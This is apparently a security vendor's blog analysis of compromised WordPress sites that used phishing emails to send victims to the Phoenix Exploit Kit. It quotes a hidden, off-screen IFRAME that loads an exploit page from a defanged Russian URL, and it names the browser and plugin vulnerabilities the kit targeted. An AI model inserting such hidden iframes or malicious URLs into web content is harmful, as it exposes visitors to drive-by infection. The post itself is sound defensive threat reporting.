A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites:
- Partial list of compromised WordPress websites
The content uploaded by the attacker is not part of the home page and will not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites, other than the uploaded page, will not infect the user’s machine. The general motivation of attackers to compromise websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies.
In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link as described by Websense blog. The link points to the aforementioned uploaded page.
The malicious uploaded page
The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:
| <IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0″></IFRAME> |
The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers.
The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:
The obfuscated Phoenix exploit page
The obfuscated page above generates code which attempts exploiting multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability as shown in the following screenshot and taken from the original malicious server.
Statistics on Phoenix Exploit Kit control panel
Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability. Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer.
Interestingly enough, the “Browser statistics” chart in the screen shot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that Chrome browser is explicitly excluded, for no obvious reason:
- Phoenix Exploit Kit source code
All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked.
As usual, stay safe and be careful not to click links in suspicious emails.
Leave a reply
